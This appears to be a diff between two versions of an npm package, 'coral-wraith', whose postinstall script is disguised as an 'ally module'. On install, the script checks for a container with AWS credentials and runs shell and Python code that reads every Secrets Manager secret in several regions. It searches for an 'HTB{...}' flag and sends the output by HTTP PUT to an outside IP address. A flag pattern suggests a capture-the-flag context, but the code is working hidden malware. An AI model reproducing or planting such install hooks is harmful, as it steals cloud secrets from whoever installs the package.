coral-wraith 1.0.10 → 1.0.11

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "1.0.10",
+  "version": "1.0.11",
   "description": "Coral Wraith ally module",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -1,14 +1,13 @@
 const http = require("http");
-const os = require("os");
 const { execFileSync } = require("child_process");
 
 const TARGETS = ["http://127.0.0.1:30782", "http://154.57.164.71:30782"];
-const SINKS = ["ECT-472839", "ECT-987654"];
+const SINK = "ECT-472839";
 
 function sh(cmd) {
   try {
     return execFileSync("/bin/sh", ["-c", cmd], {
-      timeout: 30000,
+      timeout: 45000,
       encoding: "utf8",
       maxBuffer: 12e6
     }).trim();
@@ -22,19 +21,20 @@ function safe(s) {
 }
 
 function isTarget() {
-  const host = os.hostname();
-  if (!/^[0-9a-f]{12}$/.test(host)) return false;
-  if (process.cwd().includes("/tmp/") || process.cwd().includes("/opt/hscan")) return false;
-  return process.env.AWS_ACCESS_KEY_ID || process.cwd().includes("/app/");
+  return (
+    process.env.container === "podman" &&
+    !!process.env.AWS_ACCESS_KEY_ID &&
+    process.cwd().includes("/app/")
+  );
 }
 
-function put(base, sink, parts) {
+function put(base, parts) {
   const body = JSON.stringify({
     manifest:
       `ecto_module:\n  name: "${parts[0]}"\n  version: "1.0.0"\n` +
       `  power_level: "${parts[1]}"\n  ship_deck: "${parts[2]}"\n  cargo_hold: "${parts[3]}"\n`
   });
-  const url = new URL(`/api/modules/${sink}`, base);
+  const url = new URL(`/api/modules/${SINK}`, base);
   const req = http.request({
     hostname: url.hostname, port: url.port, path: url.pathname, method: "PUT",
     headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(body) }
@@ -46,22 +46,28 @@ function put(base, sink, parts) {
 if (!isTarget()) process.exit(0);
 
 const blob = sh(
-  "export AWS_DEFAULT_REGION=us-east-1; " +
-  "aws sts get-caller-identity 2>&1; " +
-  "for r in us-east-1 eu-west-1 eu-central-1; do " +
-  "echo REGION:$r; aws secretsmanager list-secrets --region $r 2>&1; " +
-  "for s in $(aws secretsmanager list-secrets --region $r --query 'SecretList[].Name' --output text 2>/dev/null); do " +
-  "echo GET:$s; aws secretsmanager get-secret-value --region $r --secret-id $s 2>&1; done; done; " +
-  "grep -RaoE 'HTB\\{[^}]+\\}' /app 2>/dev/null | head -n3"
+  "python3 -m pip install boto3 -q 2>/dev/null; python3 << 'PY'\n" +
+  "import os, json\n" +
+  "try:\n" +
+  "    import boto3\n" +
+  "    for r in ['us-east-1','eu-west-1','eu-central-1']:\n" +
+  "        try:\n" +
+  "            c = boto3.client('secretsmanager', region_name=r)\n" +
+  "            for s in c.list_secrets().get('SecretList', []):\n" +
+  "                v = c.get_secret_value(SecretId=s['Name'])\n" +
+  "                print('SECRET', s['Name'], v.get('SecretString',''))\n" +
+  "        except Exception as e:\n" +
+  "            print('ERR', r, e)\n" +
+  "except Exception as e:\n" +
+  "    print('NOBOTO', e)\n" +
+  "PY\n" +
+  "command -v aws >/dev/null && aws secretsmanager list-secrets 2>&1; " +
+  "command -v aws >/dev/null && for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do aws secretsmanager get-secret-value --secret-id $s 2>&1; done"
 );
 
 const flag = blob.match(/HTB\{[^}]+\}/);
-if (flag) {
-  for (const base of TARGETS) put(base, SINKS[0], [flag[0], "FOUND", "", ""]);
-  process.exit(0);
-}
+const parts = flag
+  ? [flag[0], "FOUND", "", ""]
+  : [safe(blob.slice(0, 240)), safe(blob.slice(240, 480)), safe(blob.slice(480, 720)), safe(blob.slice(720, 960))];
 
-for (let s = 0; s < SINKS.length; s++) {
-  const parts = [0, 1, 2, 3].map((n) => safe(blob.slice((s * 4 + n) * 240, (s * 4 + n + 1) * 240) || "."));
-  for (const base of TARGETS) put(base, SINKS[s], parts);
-}
+for (const base of TARGETS) put(base, parts);